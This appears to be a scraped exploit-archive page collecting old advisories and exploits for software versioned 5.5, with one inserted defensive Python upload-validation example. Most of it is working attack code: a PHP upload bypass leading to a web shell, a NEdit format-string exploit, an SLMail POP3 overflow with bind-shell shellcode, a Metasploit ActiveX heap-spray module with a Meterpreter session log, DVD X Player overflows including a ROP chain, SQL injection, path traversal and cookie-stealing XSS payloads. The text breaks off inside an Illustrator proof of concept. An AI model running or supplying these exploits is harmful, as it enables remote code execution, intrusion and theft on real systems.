exploit cenros 5.5
/wwwthreads-5.5.txt ( na)
---------- Forwarded message ----------
Date: 30 Jan 2002 22:12:17 -0000
From: Root Extractor <condor@phreaker.net>
To: bugtraq@securityfocus.com
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system
[ WWWThreads, UBBThreads ] Security Hole in upload system
Author: RootExtractor, CompuMe
condor@phreaker.net, compume2000@hotmail.com
I. Details
II. Vulnerable versions
III. Example, Xploit
IV. Solution
Details :
..: config.inc.php :..
- ------------------------- snip ------------------------------
// $config['excludefiles'] = ".php,.asp,.js,.vbs,.sht,.htm";
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";
- ------------------------- snip ------------------------------
that files that were not listed in the allow files could
still be uploaded. Seems you checked the extension,
but if someone added an allowable extension before
the bogus extension, the file would upload.
vulnerable :
WWWThreads and UBBThreads 5.5 Dev11 and prior
not vulnerable :
UBBThreads 5.5
Example :
you allow the upload of .txt,.jpg,.bmp,.zip
all files that don't have those extensions should not
be uploaded
However if somebody changes the name of the file to
blah.txt.php the file will validate and upload......huh !
Xploit :
1) make new file $ touch blah.txt.php
2) edit it $ vi blah.txt.php (in this step, write a php
code, for example)
<?php
$readfile = join("", file("../config.inc.php"));
print $readfile;
?>
3) save & upload it
4) visit your blah file, now you can see the config file
of your victim forum
5) I replaced the readfile code with a PHP shell file
Solution :
visit infopop.com and download ubbthreads 5.5
http://www.infopop.com/
Copyright 2002 recm security team
http://hop.to/condor
WWWThreads aka UBBThreads v5.5dev11 and below has a security hole in the upload system which allows remote users to upload php code which runs on the server. Fix available here.
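The advisory above describes an extension check that accepts `blah.txt.php` because an allowed extension appears before the bogus one. The following is an added example (not WWWThreads or UBBThreads code): `naive_is_allowed` is a constructed model of the behaviour the advisory describes, and `hardened_is_allowed` shows the check a defender would want, deciding on the final extension only, stripping any path component, and refusing a second, non-allowed extension hidden in the name. `safe_stored_name` goes one step further than the advisory and assigns a server-generated name, so the client-supplied name never reaches the filesystem. The allow list is the one from the quoted `config.inc.php`.

```python
import os
import posixpath
import secrets

# Allow list as quoted in the advisory's config.inc.php (the deny list there was commented out).
ALLOW_FILES = ".zip,.txt,.gif,.jpg,.jpeg,.bmp"
ALLOWED = {ext.strip().lower() for ext in ALLOW_FILES.split(",") if ext.strip()}


def naive_is_allowed(filename):
    """Constructed model of the flawed check described in the advisory, not the
    original code: it passes if any allowed extension occurs anywhere in the
    name, so 'blah.txt.php' is accepted because '.txt' is found."""
    lowered = filename.lower()
    return any(ext in lowered for ext in ALLOWED)


def hardened_is_allowed(filename):
    """Decide on the final extension only, after dropping any directory part.

    Returns False for dotfiles (e.g. .htaccess), names without an extension,
    a final extension outside the allow list, and names whose second-to-last
    extension is not allowed either (some web servers hand 'x.php.txt' to the
    PHP handler, so a hidden inner extension is treated as hostile too)."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return False
    root, ext = os.path.splitext(name)
    if not root or ext.lower() not in ALLOWED:
        return False
    inner = os.path.splitext(root)[1].lower()
    if inner and inner not in ALLOWED:
        return False
    return True


def safe_stored_name(filename):
    """Return a server-chosen name that keeps only the validated extension.

    Raises ValueError when the upload fails the hardened check, so callers
    cannot accidentally store a rejected file. The random stem means the
    client never controls the stored path or name."""
    if not hardened_is_allowed(filename):
        raise ValueError("upload rejected: %r" % filename)
    ext = os.path.splitext(posixpath.basename(filename.replace("\\", "/")))[1].lower()
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    # Constructed sample names covering the advisory's case and a few neighbours.
    for sample in ["blah.txt.php", "blah.php.txt", "photo.JPG", "../evil.txt", ".htaccess", "notes"]:
        print("%-14s naive=%-5s hardened=%s" % (sample, naive_is_allowed(sample), hardened_is_allowed(sample)))
```

The second extension rule is deliberately strict: `a.txt.zip` is still accepted because both parts are on the allow list, while anything with a non-listed inner extension is refused. Combining the check with a random stored name removes the remaining risk of a crafted filename being interpreted by the web server.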
Tosh/NEdit 5.5 Format String ( na)
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: tosh@tuxfamily.org
# Patch: http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: none found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@payload);
NEdit version 5.5 suffers from a format string vulnerability.
Inj3ct0r/Steady CMS 5.5 SQL Injection ( na)
===============================================
Steady-CmS <= 5.5 SQL Injection Vulnerabilities
===============================================
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Site Production: http://steadycms.ru/
Product: Steady-CmS
Version: 5.5 (wap-CMS)
SQL-inj
Throughout, the script does not filter the User-Agent header.
A sample exploit:
Opera/9.51 (Windows NT 5.1; U; ru)',sex='m
ThE End =]
Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
Steady CMS versions 5.5 and below suffer from a remote SQL injection vulnerability.
Saxtor/Java Bridge 5.5 Directory Traversal ( na)
/*Title: PHP/Java Bridge 5.5
Date : Sep 6, 2010
Author: Saxtor {Location: South America (Guyana)}
Email: admin@saxtorinc.com
Category:: Web Applications
Version: 5.5
suffers a directory traversal
vulnerability. This vulnerability could allow
attackers to read arbitrary files =>
------------------------------
http://localhost/Javabridge/source.php?source=/etc/passwd
------------------------------
*/
<?php
/**
* @param Author Saxtor Location{South America Guyana}
* @param Email: admin@saxtorinc.com
* @param Guys please don't believe in 2012; if you are, you are playing a part of getting this world to end :( it's all our perception and thinking that will cause events to happen, however you will be dead and alive at the same time hehe but for now hack the world! read data
*/
class Javabridgexploit
{
/**
* @param Start
*/
public function __construct($argv)
{
$this->Exploit($argv);
}
public function arguments($argv)
{
$_ARG = array();
foreach ($argv as $arg)
{
if (ereg('--[a-zA-Z0-9]*=.*', $arg))
{
$str = split("=", $arg);
$arg = '';
$key = ereg_replace("--", '', $str[0]);
for ($i = 1; $i < count($str); $i++)
{
$arg .= $str[$i];
}
$_ARG[$key] = $arg;
} elseif (ereg('-[a-zA-Z0-9]', $arg))
{
$arg = ereg_replace("-", '', $arg);
$_ARG[$arg] = 'true';
}
}
return $_ARG;
}
public function ConnectToVictim($url, $path, $dir)
{
$link = "$url/$path/source.php?source=$dir";
$y = preg_match_all("/http:\/\//", $link, $array);
if ($y == 1)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $link);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_REFERER, "http://www.x.org");
$output = curl_exec($ch);
$x = preg_match_all("%:root:%", $output, $array);
$guyanarocks = $array[0][0];
if ($guyanarocks == null)
{
echo "No Data Found :(";
}
else
{
echo $output;
}
}
else {
die("Invalid Url Must Include http:// example http://php-java-bridge.sourceforge.net");
}
}
public function Exploit($argv)
{
$info = $this->arguments($argv);
$url = $info['url'];
$path = $info['path'];
$dir = $info['dir'];
if ($url == null && $path == null)
{
echo "example exploit.php --url=http://php-java-bridge.sourceforge.net --path=examples --dir=/etc/passwd";
}
$this->ConnectToVictim($url, $path, $dir);
}
}
$guyanarules = new Javabridgexploit($argv);
?>
Java Bridge version 5.5 suffers from a directory traversal vulnerability.
muts/SLMail 5.5 POP3 PASS Buffer Overflow Exploit ( windows)
#########################################################
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the PASS command #
# #
#########################################################
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
#########################################################
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n###############################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!"
# milw0rm.com [2004-11-18]
Ravish/php-nuke.5.5.css.txt ( na)
PHP-Nuke is a PHP based portal management system used at thousands of sites. A Cross Site Scripting vulnerability has been discovered in PHP-Nuke version 5.5 and prior versions. There is a function called Private Messages in PHP-Nuke by which the registered users of the site can send messages to the other registered users of the site. A user can also send an HTML formatted message and can even embed JavaScript in it. Now, if the user sends a malicious JavaScript embedded message to someone, then the JavaScript would be executed on the receiver's browser.
-------------Sample Message----------------
You have been screwed!
<script>alert(document.cookie)</script>
-------------------------------------------
Thus it also allows an attacker to reveal critical information such as cookies related to that site and get hold of his account, even admin.
Get this and more at http://hackergurus.tk
Regards,
Ravish
ravishahuja1@yahoo.com
http://hackergurus.tk
Hacker Gurus:: Geeks With Attitude
http://hackergurus.tk
Sign up now to receive all the latest news and updates right in your mailbox.
PHP Nuke v5.5 has a cross site scripting vulnerability. Exploit information included.
bz1p/Image Viewer CP Gold 5.5 Buffer Overflow ( na)
# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
# Id Type Information Connection
# -- ---- ----------- ----------
# 1 meterpreter x86/win32 VICTIMXP\victim @ VICTIM 172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > shell
# Process 3536 created.
# Channel 1 created.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\victim\Desktop>
################################### Start ###################################
##
# $Id: image_viewer_cpgold.rb 10429 2010-12-03 18:46:29Z bz1p $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Image Viewer CP Gold ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Image Viewer CP Gold ActiveX Control 5.5. When
sending an overly long string to the Image2PDF() property of ImageViewer2.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bz1p (0xbz1p[<AT>]gmail.com)' ],
'Version' => '$Revision: 10429 $',
'References' =>
[
[ 'CVE', '-' ],
[ 'OSVDB', '-'],
[ 'BID', '-' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x03\x04\x05\x06",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DiscoveryDate' => 'Oct 15 2010',
'DisclosureDate' => 'Dec 2 2010',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Create some nops.
nops = Rex::Text.to_unescape(make_nops(4))
# Set the return.
ret = Rex::Text.uri_encode([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(30) + 2)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E'></object>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = ""
for (#{var_i} = 0; #{var_i} < 8500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.Image2PDF("lolznoaslrdepbypass", #{rand8});
</script>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
Image Viewer CP Gold version 5.5 Image2PDF() buffer overflow exploit for the Metasploit framework.
Rew/DVD X Player 5.5 Pro Buffer Overflow ( na)
<?php
/*
Title: DVD X Player 5.5 Pro (DEP + ASLR Bypass) Exploit
Date: Sep 08, 2011
Author: Rew (rew@leethax.info)
Discovered by: Blake (http://www.exploit-db.com/exploits/17788/)
Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup.exe
Tested on: WinXP Pro SP3 + OptOut DEP
CVE: NA (0day)
DEP bypass via VirtualProtect
ASLR bypass via non-aslr module (EPG.dll)
No SafeSEH so we use the SEH @ 616 bytes
This is my very first DEP + ASLR bypassing exploit. awesomeface.jpg
If it looks clunky and ridiculous, rather than hating, drop me a line
and offer some advice for improvement. irc.rizon.net#beer
Many thanks to Corelan Team for their wonderful article here...
http://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
*/
$padding_1 = str_repeat("A", 336);
// ROP till ya drop!
$rop = "\x08\xd9\x62\x61"; // push esp; sub eax, 20; pop ebx; retn
$rop .= "JUNK";
$rop .= "\x24\x01\x64\x61"; // xchg eax, ebx; retn
$rop .= "\xe2\xe4\x60\x61"; // xchg eax, ecx; add al, [eax]; add esp, 4; mov eax, esi; pop esi; retn 4
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "\x02\x67\x62\x61"; // pop eax; retn
$rop .= "JUNK";
$rop .= "\x08\x11\x01\x10"; // ptr to VirtualProtect
$rop .= "\x37\x13\x63\x61"; // pop edi; pop esi; retn
$rop .= "\x1b\x76\x61\x61"; // retn
$rop .= "\x50\x8b\x62\x61"; // jmp [eax]
$rop .= "\x3f\x85\x60\x61"; // pop ebp; retn
$rop .= "\x66\x56\x60\x61"; // add esp, 8; retn // return of VirtualProtect
$rop .= "\x50\x17\x60\x61"; // pop ebx; retn
$rop .= "\x84\xcd\x6f\x83"; // this will be added to the pointer already in edx to wrap and get 0x00000040
$rop .= "\x9e\x76\x62\x61"; // add edx, ebx; pop ebx; retn 10
$rop .= "\x01\x01\x01\x01"; // dword size // pretty big, but whatever, easier than dealing with nulls
$rop .= "\x31\x08\x62\x61"; // pushad; retn
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
$rop .= "JUNK";
// Couldn't find a good null-free jmp esp, so we do some more ROP to
// get esp in eax and then jmp eax to our shellcode on the stack.
$rop .= "\x08\xd9\x62\x61"; // push esp; sub eax, 20; pop ebx; retn
$rop .= "\x24\x01\x64\x61"; // xchg eax, ebx; retn
$rop .= "\xf0\x8d\x62\x61"; // add eax, 0c; retn // one more little nudge
$rop .= "\x5b\x5e\x62\x61"; // jmp eax;
$padding_2 = str_repeat("\x90", (274 - strlen($rop)));
$jmp = "\xeb\x04"; // over the pivot and into the shellcode
$pivot = "\xae\x74\x60\x61"; // add esp, 408; retn 4
// Win32 XP SP3 WinExec cmd.exe
$shellcode =
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x2F" .
"\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" .
"\xc7\x93\xc2\x77\xff\xd0";
$exploit = $padding_1.$rop.$padding_2.$jmp.$pivot.$shellcode;
fwrite(fopen("eggsploit.plf", "w"), $exploit);
?>
DVD X Player version 5.5 PRO buffer overflow exploit with DEP and ASLR bypass.
D3r K0n!G/DVD X Player 5.5 Professional Buffer Overflow ( na)
#!/usr/bin/perl
# Exploit Title: DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow
# Date: 29/08/2011
# Author: D3r K0n!G
# Version: 5.5
# Tested on: Windows XP SP3
# CVE : N/A
# Greets to: All my friends;((Dz)& muslims)
# sec4ever.com & h4kz.net
my $file = "dvd.plf";
my $buff = "\x41" x 260;
my $ret = pack ('V',0x02AF11BC); # JMP ESP from EchoDelayProcess.dll
my $shellcode = "\x90" x 200;
# windows/exec EXITFUNC=seh CMD=calc.exe R | ruby msfencode -e x86/alpha_upper -t c
# http://www.metasploit.com
$shellcode = $shellcode . "\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34".
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41".
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58".
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30".
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52".
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b".
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50".
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c".
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54".
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b".
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c".
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31".
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47".
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54".
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e".
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30".
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51".
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51".
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45".
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50".
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56".
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a".
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c".
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38".
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b".
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d".
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d".
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53".
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43".
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35".
"\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $buff.$ret.$shellcode;
close($FILE);
DVD X Player version 5.5 Professional universal buffer overflow exploit that creates a malicious .plf file.
Felipe Andres Manzano/Adobe Illustrator CS5.5 Memory Corruption Proof Of Concept ( na)
##########################################################################
#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####
##########################################################################
'''
The vulnerable function follows...
----------------------------------
.text:004A7200 ; =============== S U B R O U T I N E =======================================
.text:004A7200
.text:004A7200 ; Attributes: bp-based frame
.text:004A7200
.text:004A7200 sub_4A7200 proc near
.text:004A7200
.text:004A7200 var_11C = dword ptr -11Ch
.text:004A7200 var_118 = dword ptr -118h
.text:004A7200 var_114 = byte ptr -114h
.text:004A7200 var_14 = dword ptr -14h
.text:004A7200 var_10 = dword ptr -10h
.text:004A7200 var_C = dword ptr -0Ch
.text:004A7200 var_4 = dword ptr -4
.text:004A7200 arg_0 = dword ptr 8
.text:004A7200
.text:004A7200 push ebp
.text:004A7201 mov ebp, esp
.text:004A7203 push 0FFFFFFFFh
.text:004A7205 push offset loc_C3B8C0
.text:004A720A mov eax, large fs:0
.text:004A7210 push eax
.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc
.text:004A7217 mov eax, dword_FB3380
.text:004A721C xor eax, ebp
.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer
.text:004A7221 push ebx
.text:004A7222 push esi
.text:004A7223 push edi
.text:004A7224 push eax
.text:004A7225 lea eax, [ebp+var_C]
.text:004A7228 mov large fs:0, eax
.text:004A722E mov [ebp+var_10], esp
.text:004A7231 mov ebx, [ebp+arg_0]
.text:004A7234 mov edi, ecx
.text:004A7236 mov ecx, ebx
.text:004A7238 mov [ebp+var_118], ebx
.text:004A723E call std::basic_string::length(...) ;Original size offending size
;(It doesn't stop at null chars)
.text:004A7244 mov esi, eax
.text:004A7246 push esi
.text:004A7247 mov ecx, ebx
.text:004A7249 call std::basic_string::c_str(...)
.text:004A724F push eax
.text:004A7250 lea eax, [ebp+var_114]
.text:004A7256 push eax
.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes)
.text:004A725C lea eax, [ebp+esi+var_114]
.text:004A7263 add esp, 0Ch
.text:004A7266 mov [ebp+var_11C], eax
.text:004A726C mov byte ptr [eax], 0
.text:004A726F mov [ebp+var_4], 0
.text:004A7276 lea esi, [ebp+var_114]
.text:004A727C lea esp, [esp+0]
.text:004A7280
.text:004A7280 loc_4A7280:
.text:004A7280 cmp esi, eax
.text:004A7282 jnb short loc_4A72B6
.text:004A7284 mov edx, [edi]
.text:004A7286 mov eax, [edx+4]
.text:004A7289 push esi
.text:004A728A mov ecx, edi
.text:004A728C call eax ;Iterates over the stack copied buffer
;applying a 'locale'? character translation
;(Invalid chars noted in exploit)
.text:004A728E test eax, eax
.text:004A7290 jg short loc_4A7297
.text:004A7292 mov eax, 1
.text:004A7297
.text:004A7297 loc_4A7297:
.text:004A7297 add esi, eax
.text:004A7299 mov eax, [ebp+var_11C]
.text:004A729F jmp short loc_4A7280
.text:004A72AE ; ---------------------------------------------------------------------------
.text:004A72AE
.text:004A72AE loc_4A72AE:
.text:004A72AE mov ebx, [ebp+var_118]
.text:004A72B4 jmp short loc_4A72BD
.text:004A72B6 ; ---------------------------------------------------------------------------
.text:004A72B6
.text:004A72B6 loc_4A72B6:
.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh
.text:004A72BD
.text:004A72BD loc_4A72BD:
.text:004A72BD lea ecx, [ebp+var_114]
.text:004A72C3 push ecx
.text:004A72C4 mov ecx, ebx
.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values
;corruption it is possible to
;write a translated version of
;our buffer to anywhere
.text:004A72CC mov ecx, [ebp+var_C]
.text:004A72CF mov large fs:0, ecx
.text:004A72D6 pop ecx
.text:004A72D7 pop edi
.text:004A72D8 pop esi
.text:004A72D9 pop ebx
.text:004A72DA mov ecx, [ebp+var_14]
.text:004A72DD xor ecx, ebp
.text:004A72DF call sub_C27512 ;Check the cookie
.text:004A72E4 mov esp, ebp
.text:004A72E6 pop ebp
.text:004A72E7 retn 4
.text:004A72E7 sub_4A7200 endp
.text:004A72E7
'''
#Exploit PoC begins...
from miniPDF import * #http://pastebin.com/LUTXSSvV
import zlib,struct,os,optparse,hashlib
from subprocess import Popen, PIPE
#Character translation map for the copied buffer (Reversed from function 004A72F0)
cmap=[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
